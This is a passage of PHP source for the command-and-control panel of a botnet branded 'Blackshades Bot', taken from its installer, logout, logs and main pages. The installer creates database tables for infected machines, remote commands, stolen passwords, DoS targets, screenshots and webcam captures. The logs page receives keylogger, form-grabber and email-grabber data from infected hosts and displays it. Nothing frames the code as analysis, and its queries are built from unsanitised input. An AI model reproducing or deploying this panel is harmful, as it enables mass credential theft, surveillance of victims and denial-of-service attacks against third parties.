1373 </p>
1374 </form>
1375</body>
1376</html>
1377==> install.php <==
1378<?php
1379 if(isset($_POST['bt_install_login']))
1380 {
1381 Header("Location: index.php");
1382 }
1383?>
1384
1385<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1386<html xmlns="http://www.w3.org/1999/xhtml">
1387 <head>
1388 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
1389 <title>Blackshades Bot</title>
1390 <style type="text/css">
1391 body { margin:0px;padding:0px;background:#202020; color:#8e8e8e;font-family:Arial;font-size:12px}
1392 table { color:#8e8e8e;font-family:Arial;font-size:12px}
1393 a { color:#8e8e8e;text-decoration:none;}
1394 input { border:0px; background: #6d6d6d;font-family:Arial;font-size:12px;color:#b2b2b2}
1395 </style>
1396 </head>
1397 <body>
1398<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e">
1399<tr>
1400<td style="text-align:center">Blackshades Bot - Installer</td></tr></table>
1401
1402<?php
1403 error_reporting(0);
1404
1405 include_once('config.php');
1406
1407 //Check to see if installation has already been performed
1408 $conn=mysql_connect(DB_SERVER, DB_USER, DB_PASS);
1409 if (!$conn)
1410 {
1411 echo "<center><h3>Error: Cannot connect to database!</center></h3>";
1412 $isok = false;
1413 }
1414
1415 if(isset($_POST['bt_install'])) //For login
1416 {
1417 $username = $_POST['tx_username'];
1418 $password = $_POST['tx_password'];
1419 $confirm = $_POST['tx_confirm'];
1420 $isok = true;
1421
1422 //Check the database server
1423 $conn=mysql_connect(DB_SERVER, DB_USER, DB_PASS);
1424 if (!$conn)
1425 {
1426 echo "<center><h3>Error: Cannot connect to database!</center></h3>";
1427 $isok = false;
1428 }
1429
1430 //Check fields
1431 if(empty($username)){
1432 echo "<center><h3>Error: Passwords mismatch!</h3></center>";
1433 $isok = false;
1434 }
1435 if($password != $confirm){
1436 echo "<center><h3>Error: Passwords mismatch!</h3></center>";
1437 $isok = false;
1438 }
1439 if(empty($password)){
1440 echo "<center><h3>Error: Password field was left blank!</h3></center>";
1441 }
1442
1443 if($isok == false){
1444 exit;
1445 }
1446
1447 echo "<center><h4>Status: Preparing installation...</center></h4>";
1448 echo "<center><h4>Status: Reading required queries...</center></h4>";
1449 echo "<center><h4>Status: Executing queries...</center></h4></br>";
1450
1451 $queries = "CREATE DATABASE IF NOT EXISTS `". DB_DATABASE . "`;";
1452 $res = mysql_query($queries, $conn) or die(mysql_error());
1453 echo "<center>Status: Database '" . DB_DATABASE . "' created!!</center>";
1454
1455 mysql_select_db(DB_DATABASE);
1456 $queries = "CREATE TABLE IF NOT EXISTS `tbl_account` (
1457 `acc_id` int(10) NOT NULL AUTO_INCREMENT,
1458 `acc_name` varchar(255) NOT NULL,
1459 `acc_pw` varchar(64) NOT NULL,
1460 `acc_session` varchar(64) DEFAULT NULL,
1461 `acc_type` int(1) NOT NULL DEFAULT '1',
1462 `acc_lastip` varchar(64) DEFAULT NULL,
1463 `acc_lastlogon` datetime DEFAULT NULL,
1464 PRIMARY KEY (`acc_id`),
1465 UNIQUE KEY `acc_name` (`acc_name`)
1466 ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;";
1467 $res = mysql_query($queries, $conn) or die(mysql_error());
1468 echo "<center>Status: Table 'tbl_account' created!</center>";
1469 $queries = "DELETE FROM `tbl_account`;";
1470 $res = mysql_query($queries, $conn) or die(mysql_error());
1471
1472 $acc_pw = sha1($password);
1473 $queries = "INSERT INTO `tbl_account` (`acc_name`, `acc_pw`, `acc_type`) VALUES ('{$username}', '{$acc_pw}', 1);";
1474 $res = mysql_query($queries, $conn) or die(mysql_error());
1475 echo "<center>Status: Account added!</center>";
1476
1477 $queries = "CREATE TABLE IF NOT EXISTS `tbl_bot` (
1478 `bot_id` int(10) NOT NULL AUTO_INCREMENT,
1479 `bot_hwid` varchar(32) NOT NULL,
1480 `bot_wan` varchar(32) DEFAULT NULL,
1481 `bot_pc_user` varchar(255) DEFAULT NULL,
1482 `bot_pc_name` varchar(255) DEFAULT NULL,
1483 `bot_country` varchar(64) DEFAULT NULL,
1484 `bot_lastseen` datetime DEFAULT NULL,
1485 `bot_lastdate` date DEFAULT NULL,
1486 PRIMARY KEY (`bot_id`),
1487 UNIQUE KEY `bot_hwid` (`bot_hwid`)
1488 ) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=utf8;";
1489 $res = mysql_query($queries, $conn) or die(mysql_error());
1490 echo "<center>Status: Table 'tbl_bot' created!!</center>";
1491 $queries = "DELETE FROM `tbl_bot`;";
1492 $res = mysql_query($queries, $conn) or die(mysql_error());
1493
1494 $queries = "CREATE TABLE IF NOT EXISTS `tbl_cmd` (
1495 `cmd_id` int(10) NOT NULL AUTO_INCREMENT,
1496 `cmd_type` varchar(16) NOT NULL DEFAULT '0',
1497 `cmd_bot_hwid` varchar(32) NOT NULL DEFAULT '0',
1498 `cmd_data` varchar(255) DEFAULT '0',
1499 `cmd_filter_limit` int(10) DEFAULT '0',
1500 `cmd_filter_exec` int(10) DEFAULT '0',
1501 `cmd_filter_country` varchar(64) DEFAULT 'All',
1502 PRIMARY KEY (`cmd_id`)
1503 ) ENGINE=InnoDB AUTO_INCREMENT=58 DEFAULT CHARSET=utf8;";
1504 $res = mysql_query($queries, $conn) or die(mysql_error());
1505 echo "<center>Status: Table 'tbl_cmd' created!!</center>";
1506 $queries = "DELETE FROM `tbl_cmd`;";
1507 $res = mysql_query($queries, $conn) or die(mysql_error());
1508
1509 $queries = "CREATE TABLE IF NOT EXISTS `tbl_cmd_exec` (
1510 `exec_id` int(10) NOT NULL AUTO_INCREMENT,
1511 `cmd_id` int(10) NOT NULL DEFAULT '0',
1512 `bot_hwid` varchar(32) NOT NULL,
1513 `exec_date` datetime NOT NULL,
1514 `exec_time` datetime NOT NULL,
1515 PRIMARY KEY (`exec_id`),
1516 KEY `FK_tbl_cmd_exec_tbl_bot` (`bot_hwid`),
1517 KEY `FK_tbl_cmd_exec_tbl_cmd` (`cmd_id`),
1518 CONSTRAINT `FK_tbl_cmd_exec_tbl_bot` FOREIGN KEY (`bot_hwid`) REFERENCES `tbl_bot` (`bot_hwid`) ON DELETE CASCADE ON UPDATE CASCADE,
1519 CONSTRAINT `FK_tbl_cmd_exec_tbl_cmd` FOREIGN KEY (`cmd_id`) REFERENCES `tbl_cmd` (`cmd_id`) ON DELETE CASCADE ON UPDATE CASCADE
1520 ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;";
1521 $res = mysql_query($queries, $conn) or die(mysql_error());
1522 echo "<center>Status: Table 'tbl_cmd_exec' created!!</center>";
1523 $queries = "DELETE FROM `tbl_cmd_exec`;";
1524 $res = mysql_query($queries, $conn) or die(mysql_error());
1525
1526 $queries = "CREATE TABLE IF NOT EXISTS `tbl_history` (
1527 `bot_hwid` varchar(32) NOT NULL,
1528 `hst_lastdate` date NOT NULL,
1529 PRIMARY KEY (`bot_hwid`,`hst_lastdate`),
1530 UNIQUE KEY `bot_hwid_hst_lastdate` (`bot_hwid`,`hst_lastdate`),
1531 CONSTRAINT `FK_tbl_history_tbl_bot` FOREIGN KEY (`bot_hwid`) REFERENCES `tbl_bot` (`bot_hwid`) ON DELETE CASCADE ON UPDATE CASCADE
1532 ) ENGINE=InnoDB DEFAULT CHARSET=utf8;";
1533 $res = mysql_query($queries, $conn) or die(mysql_error());
1534 echo "<center>Status: Table 'tbl_history' created!!</center>";
1535 $queries = "DELETE FROM `tbl_history`;";
1536 $res = mysql_query($queries, $conn) or die(mysql_error());
1537
1538 $queries = "CREATE TABLE IF NOT EXISTS `tbl_log` (
1539 `bot_hwid` varchar(32) NOT NULL,
1540 `log_data` mediumtext,
1541 `log_type` varchar(32) DEFAULT NULL,
1542 `log_date` date NOT NULL,
1543 `log_datetime` datetime NOT NULL,
1544 KEY `FK_tbl_log_tbl_bot` (`bot_hwid`),
1545 CONSTRAINT `FK_tbl_log_tbl_bot` FOREIGN KEY (`bot_hwid`) REFERENCES `tbl_bot` (`bot_hwid`) ON DELETE CASCADE ON UPDATE CASCADE
1546 ) ENGINE=InnoDB DEFAULT CHARSET=utf8;";
1547 $res = mysql_query($queries, $conn) or die(mysql_error());
1548 echo "<center>Status: Table 'tbl_log' created!!</center>";
1549 $queries = "DELETE FROM `tbl_log`;";
1550 $res = mysql_query($queries, $conn) or die(mysql_error());
1551
1552 $queries = "CREATE TABLE `tbl_pws` (
1553 `bot_hwid` VARCHAR(32) NOT NULL,
1554 `pw_app` VARCHAR(64) NOT NULL,
1555 `pw_host` VARCHAR(128) NOT NULL,
1556 `pw_login` VARCHAR(32) NOT NULL,
1557 `pw_password` VARCHAR(32) NOT NULL,
1558 `pw_date` DATE NULL DEFAULT NULL,
1559 `pw_datetime` DATETIME NULL DEFAULT NULL,
1560 UNIQUE INDEX `bot_hwid_pw_app_pw_host_pw_login_pw_password` (`bot_hwid`, `pw_app`, `pw_host`, `pw_login`, `pw_password`)
1561 )
1562 COLLATE='utf8_general_ci'
1563 ENGINE=InnoDB
1564 ROW_FORMAT=DEFAULT";
1565 $res = mysql_query($queries, $conn) or die(mysql_error());
1566 echo "<center>Status: Table 'tbl_pws' created!!</center>";
1567 $queries = "DELETE FROM `tbl_pws`;";
1568 $res = mysql_query($queries, $conn) or die(mysql_error());
1569
1570 $queries = "CREATE TABLE `tbl_dos` (
1571 `dos_id` INT(10) NOT NULL AUTO_INCREMENT,
1572 `dos_type` VARCHAR(16) NOT NULL DEFAULT '0',
1573 `dos_target` VARCHAR(255) NOT NULL DEFAULT '0',
1574 `dos_port` INT(5) NOT NULL DEFAULT '0',
1575 `dos_protocol` VARCHAR(8) NOT NULL DEFAULT '0',
1576 `dos_filter_limit` INT(10) NULL DEFAULT '0',
1577 `dos_filter_exec` INT(10) NULL DEFAULT '0',
1578 `dos_filter_country` VARCHAR(64) NULL DEFAULT 'All',
1579 PRIMARY KEY (`dos_id`)
1580 )
1581 COLLATE='utf8_general_ci'
1582 ENGINE=InnoDB
1583 ROW_FORMAT=DEFAULT
1584 AUTO_INCREMENT=1";
1585 $res = mysql_query($queries, $conn) or die(mysql_error());
1586 echo "<center>Status: Table 'tbl_dos' created!!</center>";
1587 $queries = "DELETE FROM `tbl_dos`;";
1588 $res = mysql_query($queries, $conn) or die(mysql_error());
1589
1590 $queries = "CREATE TABLE `tbl_dos_exec` (
1591 `exec_id` INT(10) NOT NULL AUTO_INCREMENT,
1592 `dos_id` INT(10) NOT NULL DEFAULT '0',
1593 `bot_hwid` VARCHAR(32) NOT NULL,
1594 `exec_date` DATETIME NOT NULL,
1595 `exec_time` DATETIME NOT NULL,
1596 PRIMARY KEY (`exec_id`),
1597 INDEX `FK_tbl_dos_exec_tbl_bot` (`bot_hwid`),
1598 INDEX `FK_tbl_dos_exec_tbl_dos` (`dos_id`),
1599 CONSTRAINT `FK_tbl_dos_exec_tbl_bot` FOREIGN KEY (`bot_hwid`) REFERENCES `tbl_bot` (`bot_hwid`) ON UPDATE CASCADE ON DELETE CASCADE,
1600 CONSTRAINT `FK_tbl_dos_exec_tbl_dos` FOREIGN KEY (`dos_id`) REFERENCES `tbl_dos` (`dos_id`) ON UPDATE CASCADE ON DELETE CASCADE
1601 )
1602 COLLATE='utf8_general_ci'
1603 ENGINE=InnoDB
1604 ROW_FORMAT=DEFAULT";
1605 $res = mysql_query($queries, $conn) or die(mysql_error());
1606 echo "<center>Status: Table 'tbl_dos_exec' created!!</center>";
1607 $queries = "DELETE FROM `tbl_dos_exec`;";
1608 $res = mysql_query($queries, $conn) or die(mysql_error());
1609
1610 $queries = "CREATE TABLE `tbl_scr` (
1611 `bot_hwid` VARCHAR(32) NOT NULL,
1612 `scr_date` DATE NOT NULL,
1613 `scr_datetime` DATETIME NOT NULL
1614 )
1615 COLLATE='utf8_general_ci'
1616 ENGINE=InnoDB
1617 ROW_FORMAT=DEFAULT";
1618 $res = mysql_query($queries, $conn) or die(mysql_error());
1619 echo "<center>Status: Table 'tbl_scr' created!!</center>";
1620 $queries = "DELETE FROM `tbl_scr`;";
1621 $res = mysql_query($queries, $conn) or die(mysql_error());
1622
1623 $queries = "CREATE TABLE `tbl_webc` (
1624 `bot_hwid` VARCHAR(32) NOT NULL,
1625 `webc_date` DATE NOT NULL,
1626 `webc_datetime` DATETIME NOT NULL
1627 )
1628 COLLATE='utf8_general_ci'
1629 ENGINE=InnoDB
1630 ROW_FORMAT=DEFAULT";
1631 $res = mysql_query($queries, $conn) or die(mysql_error());
1632 echo "<center>Status: Table 'tbl_webc' created!!</center>";
1633 $queries = "DELETE FROM `tbl_webc`;";
1634 $res = mysql_query($queries, $conn) or die(mysql_error());
1635
1636 $_SESSION['username'] = $username;
1637 $_SESSION['password'] = $password;
1638 echo "<br/><center><h3>Installation is complete!</h3></center>";
1639
1640 echo "<br/><center><h3>WARNING: You may wish to delete 'install.php' in order to prevent unwanted interaction with this system.</h3></center>";
1641
1642 echo "<center><form id='form_submit' name='form_submit' method='post' action=''>
1643 <input type='submit' name='bt_install_login' id='bt_install_login' value='Proceed'/>
1644 </form></center>";
1645 exit;
1646 }
1647?>
1648<form id="form_submit" name="form_submit" method="post" action="">
1649 <p>
1650 <table align="center"><tr>
1651 </p>
1652 <p>
1653 <tr><td><label>Choose a username:</td>
1654 <td> <input type="text" name="tx_username" id="tx_username" /> <img src="img/main/username.png" width="16" height="16"/></td></tr>
1655 <p>
1656 <tr><td><label>Choose a password:</td>
1657 <td>
1658 <input type="password" name="tx_password" id="tx_password" /> <img src="img/main/key.png" width="16" height="16"/>
1659 <label>Confirm password: <input type="password" name="tx_confirm" id="tx_confirm" />
1660 </td>
1661 </tr>
1662 <tr>
1663 <td><p> </p>
1664 <p><br/>
1665 <input type="submit" name="bt_install" id="bt_install" value="Install" />
1666 </p></td>
1667 </table>
1668 </label>
1669 </p>
1670</form>
1671</body>
1672</html>
1673==> logout.php <==
1674<?php
1675 session_start();
1676 session_unset();
1677 session_destroy();
1678?>
1679
1680<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1681<html xmlns="http://www.w3.org/1999/xhtml">
1682 <head>
1683 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
1684 <style type="text/css">
1685 body { margin:0px;padding:0px;background:#202020; color:#8e8e8e;font-family:Arial;font-size:12px}
1686 table { color:#8e8e8e;font-family:Arial;font-size:12px}
1687 a { color:#8e8e8e;text-decoration:none;}
1688 input { border:0px; background: #6d6d6d;font-family:Arial;font-size:12px;color:#b2b2b2}
1689 </style>
1690 </head>
1691 <body>
1692<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="text-align:center">Successfully logged out!</td></tr></table>
1693<table width="100%" style="background: #414140;height:30px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="font-size:12px;background:#272727"><table style="margin:0px;padding:0px;font-size:11px;color:#8e8e8e"><tr><td style="width:120px;background:#3b3b3b;text-align:center"><a href="index.php">Log in</a></td></tr></table></td></tr></table>
1694==> logs.php <==
1695<?php
1696 error_reporting(0);
1697 include_once('db/database.inc.php');
1698 include_once('config.php');
1699
1700 if(isset($_POST['key']) && isset($_POST['hwid']) && isset($_POST['data']) && isset($_POST['type'])){
1701 if($_POST['key'] == $CFG_PASSWORD){ //Auth check
1702
1703 date_default_timezone_set(date_default_timezone_get());
1704 $date = new DateTime("now");
1705 $res = mysql_query("INSERT INTO tbl_log (bot_hwid, log_data, log_type, log_date, log_datetime)
1706 VALUES ('" . $_POST['hwid'] . "', '" . urldecode($_POST['data']) . "', '" . $_POST['type'] . "', '" . $date->format('Y-m-d') . "', '" . $date->format('Y-m-d H:i:s') . "')");
1707 mysql_free_result($res);
1708 }else{ //Wrong password/key
1709 echo $CFG_ERROR_MSG;
1710 }
1711 exit;
1712 }
1713
1714 if (!$auth->verify()){ //If unauthorized
1715 Header("Location: index.php");
1716 exit;
1717 }
1718
1719 if(isset($_POST['btn_delete']))
1720 {
1721 //Check privileges
1722 if($_SESSION['privileges'] == '0'){
1723 echo $CFG_UNATHORIZED;
1724 exit;
1725 }
1726
1727 if($_POST['log_date_del'] == "All"){ //Delete all logs
1728 $res = mysql_query("TRUNCATE TABLE tbl_log");
1729 mysql_free_result($res);
1730 $res = mysql_query("TRUNCATE TABLE tbl_cmd_exec");
1731 mysql_free_result($res);
1732 }else{ //Delete all logs within selected date
1733 $res = mysql_query("DELETE FROM tbl_log WHERE log_date = '{$_POST['log_date_del']}'");
1734 mysql_free_result($res);
1735 $res = mysql_query("DELETE FROM tbl_cmd_exec WHERE exec_date = '{$_POST['log_date_del']}'");
1736 mysql_free_result($res);
1737 }
1738 }
1739?>
1740
1741<html>
1742<header>
1743<style type="text/css">
1744body { margin:0px;padding:0px;background:#202020; color:#8e8e8e;font-family:Arial;font-size:12px}
1745table { color:#8e8e8e;font-family:Arial;font-size:12px}
1746a { color:#8e8e8e;text-decoration:none;}
1747input { border:0px; background: #6d6d6d;font-family:Arial;font-size:12px;color:#b2b2b2}
1748 <!--
1749 .tb_summary {
1750 text-align: center;
1751 font-weight: bold;
1752 }
1753 .tb_summary_cols {
1754 text-align: center;
1755 }
1756 .tb_summary_cols {
1757 text-align: left;
1758 font-weight: bold;
1759 }
1760 -->
1761</style>
1762
1763</header>
1764<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="text-align:center">Logs
1765<?php include_once('header.php'); ?>
1766
1767<title>Blackshades Bot</title>
1768<br/><br/>
1769<center>
1770 <form id="from_log" name="f_log" method="post" action="">
1771 <div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary">Log date:</span>
1772 <select name="log_date" id="log_date">
1773 <?php
1774 $res = mysql_query("SELECT DISTINCT log_date FROM tbl_log ORDER BY log_date DESC");
1775 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)){
1776 echo "<option value='" . $row['log_date'] . "'" . ">" . $row['log_date'] . "</option>";
1777 }
1778 echo "<option value='All'>All</option>";
1779 mysql_free_result($res);
1780 ?>
1781 </select>
1782 <span class="tb_summary">Log type:</span>
1783 <select name="log_type" id="log_type">
1784 <?php
1785 echo "<option value='All'>All</option>";
1786 echo "<option value='Keylogger'>Keylog</option>";
1787 echo "<option value='Form Grabber'>Form grabber</option>";
1788 echo "<option value='Email Grabber'>Email grabber</option>";
1789 ?>
1790 </select>
1791 <img src="img/main/search.png" width="16" height="12"/><label>Search:</label>
1792 <label><input type="text" name="log_search" id="log_search"></label>
1793 <input type="submit" name="btn_log" id="btn_log" value="Show"/>
1794 </div>
1795 </form></center>
1796
1797<td width="20%">
1798<br/>
1799 <p>
1800
1801 <?php
1802
1803 if(isset($_POST['btn_log']) || isset($_GET['page']))
1804 {
1805 if($_POST['log_date'] == "All"){ //Show all logs
1806 if(!empty($_POST['log_search'])){ //Perform search on all logs
1807 if($_POST['log_type'] == "All"){
1808 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, log_datetime, log_data, log_type FROM tbl_bot,tbl_log WHERE tbl_bot.bot_hwid = tbl_log.bot_hwid AND log_data LIKE '%{$_POST['log_search']}%'");
1809 }else{
1810 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, log_datetime, log_data, log_type FROM tbl_bot,tbl_log WHERE log_type = '{$_POST['log_type']}' AND tbl_bot.bot_hwid = tbl_log.bot_hwid AND log_data LIKE '%{$_POST['log_search']}%'");
1811 }
1812 }else{ //No search
1813 if($_POST['log_type'] == "All"){
1814 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, log_datetime, log_data, log_type FROM tbl_bot,tbl_log WHERE tbl_bot.bot_hwid = tbl_log.bot_hwid");
1815 }else{
1816 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, log_datetime, log_data, log_type FROM tbl_bot,tbl_log WHERE log_type = '{$_POST['log_type']}' AND tbl_bot.bot_hwid = tbl_log.bot_hwid");
1817 }
1818 }
1819 }elseif($_POST['log_date'] != "All" && !isset($_GET['page'])){
1820 if($_POST['log_date'] != "All"){ //Perform search on selected date
1821 if($_POST['log_type'] == "All"){
1822 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, log_datetime, log_data, log_type FROM tbl_bot,tbl_log WHERE tbl_bot.bot_hwid = tbl_log.bot_hwid AND log_date = '{$_POST['log_date']}' AND log_data LIKE '%{$_POST['log_search']}%'");
1823 }else{
1824 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, log_datetime, log_data, log_type FROM tbl_bot,tbl_log WHERE log_type = '{$_POST['log_type']}' AND tbl_bot.bot_hwid = tbl_log.bot_hwid AND log_date = '{$_POST['log_date']}' AND log_data LIKE '%{$_POST['log_search']}%'");
1825 }
1826 }else{ //No search
1827 if($_POST['log_type'] == "All"){
1828 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, log_datetime, log_data, log_type FROM tbl_bot,tbl_log WHERE tbl_bot.bot_hwid = tbl_log.bot_hwid AND log_date = '{$_POST['log_date']}'");
1829 }else{
1830 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, log_datetime, log_data, log_type FROM tbl_bot,tbl_log WHERE log_type = '{$_POST['log_type']}' AND tbl_bot.bot_hwid = tbl_log.bot_hwid AND log_date = '{$_POST['log_date']}'");
1831 }
1832 }
1833 }elseif(isset($_GET['page'])){
1834 $rows = mysql_num_rows(mysql_query("SELECT * FROM tbl_log"));
1835 $pos = ($_GET['page'] * $PAGE_ROWS_LIMIT) - $PAGE_ROWS_LIMIT;
1836 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, log_datetime, log_data, log_type FROM tbl_bot,tbl_log WHERE tbl_bot.bot_hwid = tbl_log.bot_hwid LIMIT $pos,$PAGE_ROWS_LIMIT");
1837 }
1838
1839 if($_POST['log_type'] == "Email Grabber"){
1840 echo "<table width='70%' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>";
1841 echo "<tr><td width='100%' class='tb_summary_cols'>";
1842 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)){
1843 echo $row['log_data'];
1844 }
1845 "</td></tr>";
1846 echo "</table><br/><br/>";
1847 }else{
1848 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
1849 echo "<table width='70%' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>";
1850 echo "<tr>".
1851 "<td width='100%' class='tb_summary_cols'>".$row['log_type']." => ".$row['bot_wan']."^".$row['bot_pc_user']."-".$row['bot_pc_name']." (ID: ".$row['bot_hwid'].")".
1852 " [".$row['log_datetime']."]"."<br/><br/>".$row['log_data']."</td>" .
1853 "</tr>";
1854 echo "</table><br/><br/>";
1855 }
1856 }
1857 mysql_free_result($res);
1858 }
1859
1860 $rows = mysql_result (mysql_query("SELECT COUNT(*) FROM tbl_log"),0); //Get number of records
1861 echo "<br/><center><div style='font-family:Arial;font-size:18px;color:#636363'><span class='tb_summary'>Page: ";
1862 $page = 0;
1863 while($rows >= 0){
1864 $page++;
1865 if($page % 25 == 0)
1866 echo "<br/>";
1867 if($rows >= $PAGE_ROWS_LIMIT){
1868 if($_GET['page'] == $page)
1869 echo "<span style='font-size:12px'><a href='logs.php?page={$page}'>$page</a></span> ";
1870 else
1871 echo "<a href='logs.php?page={$page}'>$page</a> ";
1872 }else{
1873 if($_GET['page'] == $page)
1874 echo "<span style='font-size:12px'><a href='logs.php?page={$page}'>$page</a></span> ";
1875 else
1876 echo "<a href='logs.php?page={$page}'>$page</a> ";
1877 }
1878 $rows -= $PAGE_ROWS_LIMIT;
1879 }
1880 echo "</div></center>";
1881?>
1882 </p>
1883 <br/>
1884 <center><form name="f_delete" method="post" action="">
1885 <span style="font-family:Arial;font-size:16px;color:#636363"><img src="img/main/delete.png" width="15" height="13"/><span class="tb_summary">Logs:</span>
1886 <select name="log_date_del" id="log_date_del">
1887 <?php
1888 echo "<option value='None'>None</option>";
1889 $res = mysql_query("SELECT DISTINCT log_date FROM tbl_log ORDER BY log_date DESC");
1890 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)){
1891 echo "<option value='" . $row['log_date'] . "'" . ">" . $row['log_date'] . "</option>";
1892 }
1893 echo "<option value='All'>Everything</option>";
1894 mysql_free_result($res);
1895 ?>
1896 </select> <input type="submit" name="btn_delete" id="btn_delete" value="Delete"/></span>
1897 </form></center>
1898==> main.php <==
1899<?php
1900 error_reporting(0);
1901 include_once('db/database.inc.php');
1902 include('classes/account.php');
1903
1904 if(isset($_GET['l']))
1905 $auth->logout();
1906
1907 if ($auth->verify()){
1908 $acc = new Account($_SESSION['username']);
1909 date_default_timezone_set(date_default_timezone_get());
1910 $date = new DateTime("now");
1911 $res = mysql_query("UPDATE tbl_account SET acc_lastlogon = '{$date->format('Y-m-d H:i:s')}' WHERE acc_name = '{$_SESSION['username']}'");
1912 }else{
1913 Header("Location: index.php");
1914 exit;
1915 }
1916?>
1917
1918<style type="text/css">
1919 body {
1920 margin:0px;
1921 padding:0px;
1922 background:#202020;
1923 color:#8e8e8e;
1924 font-family:Arial;
1925 font-size:12px
1926 }
1927 table { color:#8e8e8e;font-family:Arial;font-size:12px}
1928 a { color:#8e8e8e;text-decoration:none;}
1929 input { border:0px; background: #6d6d6d;font-family:Arial;font-size:12px;color:#b2b2b2}
1930 <!--
1931 .tb_summary {
1932 text-align: center;
1933 font-weight: bold;
1934 }
1935 .tb_details_cols {
1936 font-weight: bold;
1937 text-align: right;
1938 }
1939 .tb_details_rows {
1940 text-align: center;
1941 }
1942 .tb_summary_cols {
1943 text-align: center;
1944 }
1945 .tb_summary_cols {
1946 text-align: right;
1947 }
1948 .tb_summary_rows {
1949 text-align: center;
1950 }
1951 -->
1952</style>
1953<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="text-align:center">Main
1954<?php include_once('header.php'); ?>
1955<title>Blackshades Bot</title>
1956<br>
1957<center><div style="font-family:Arial;font-size:16px;color:#636363">Welcome, <?php echo $_SESSION['username']; ?></div></center>
1958<br />
1959<tr>
1960<center><div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary">Overall statistics</span> <img src="img/main/history.png" width="16" height="16"/></div></center>
1961<td width="20%">
1962<table width="480" style="border:1px solid #505050" align="center" cellspacing="0" cellpadding="1">
1963 <tr>
1964 <td width="40%" class="tb_details_cols"><img src="img/main/total.png" width="16" height="12"/> Total bots in record:</td>
1965 <td width="60%" class="tb_details_rows"><?php echo $acc->bots_total(); ?></td>
1966 </tr>
1967 <tr>
1968 <td class="tb_details_cols"><img src="img/main/online.png" width="16" height="12"/> Total bots online:</td>
1969 <td class="tb_details_rows"><?php echo $acc->bots_online(); ?></td>
1970 </tr>
1971 <tr>
1972 <td class="tb_details_cols"><img src="img/main/remove.png" width="16" height="12"/> Dead bots:</td>
1973 <td class="tb_details_rows"><?php echo $acc->bots_dead(); ?></td>
1974 </tr>
1975 <tr>
1976 <td class="tb_details_cols"> </td>
1977 <td class="tb_details_rows"> </td>
1978 </tr>
1979 <tr>
1980 <td class="tb_details_cols"><img src="img/main/ip.png" width="16" height="12"/> Last IP:</td>
1981 <td class="tb_details_rows"><?php echo $acc->last_ip_get(); ?></td>
1982 </tr>
1983 <tr>
1984 <td class="tb_details_cols"><img src="img/main/lastlogin.png" width="16" height="12"/> Last logged in:</td>
1985 <td class="tb_details_rows"><?php echo $acc->last_logon(); ?></td>
1986 </tr>
1987</table>
1988<p><br />
1989</p></td>
1990
1991<center><div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary">Total country statistics</span> <img src="img/main/country.png" width="16" height="16"/></div></center>
1992<td width="20%">
1993<table width="480" style="border:1px solid #505050" align="center" cellspacing="0" cellpadding="1">
1994 <?php
1995 $res = mysql_query("SELECT bot_country, COUNT(bot_id) FROM tbl_bot GROUP BY bot_country");
1996 echo "<tr><th width='60%' class='tb_summary_cols'>" . "<img src='img/main/country.png' width='14' height='14'/> " . "Country</th>" .
1997 "<th width='40%' class='tb_summary_rows'>" . "<img src='img/main/history.png' width='14' height='14'/> " . "Total</th>";
1998
1999 echo "<tr><td width='60%' class='tb_summary_cols'> </td>" .
2000 "<td width='40%' class='tb_summary_rows'> </td></tr>";
2001
2002 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
2003 echo "<tr>".
2004 "<td width='60%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['bot_country']) . ".gif' width='16' height='11'/> " . $row['bot_country'] . ":" . "</td>" .
2005 "<td width='40%' class='tb_summary_rows'>" . $row['COUNT(bot_id)'] . "</td>" .
2006 "</tr>";
2007 }
2008 mysql_free_result($res);
2009 ?>
2010</table>
2011<br /><br />
2012<center>
2013 <form id="from_history" name="f_history" method="post" action="">
2014 <div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary"><img src="img/main/date.png" width="15" height="15"/>Statistics by date</span>
2015 <select name="history_date" id="history_date">
2016 <?php
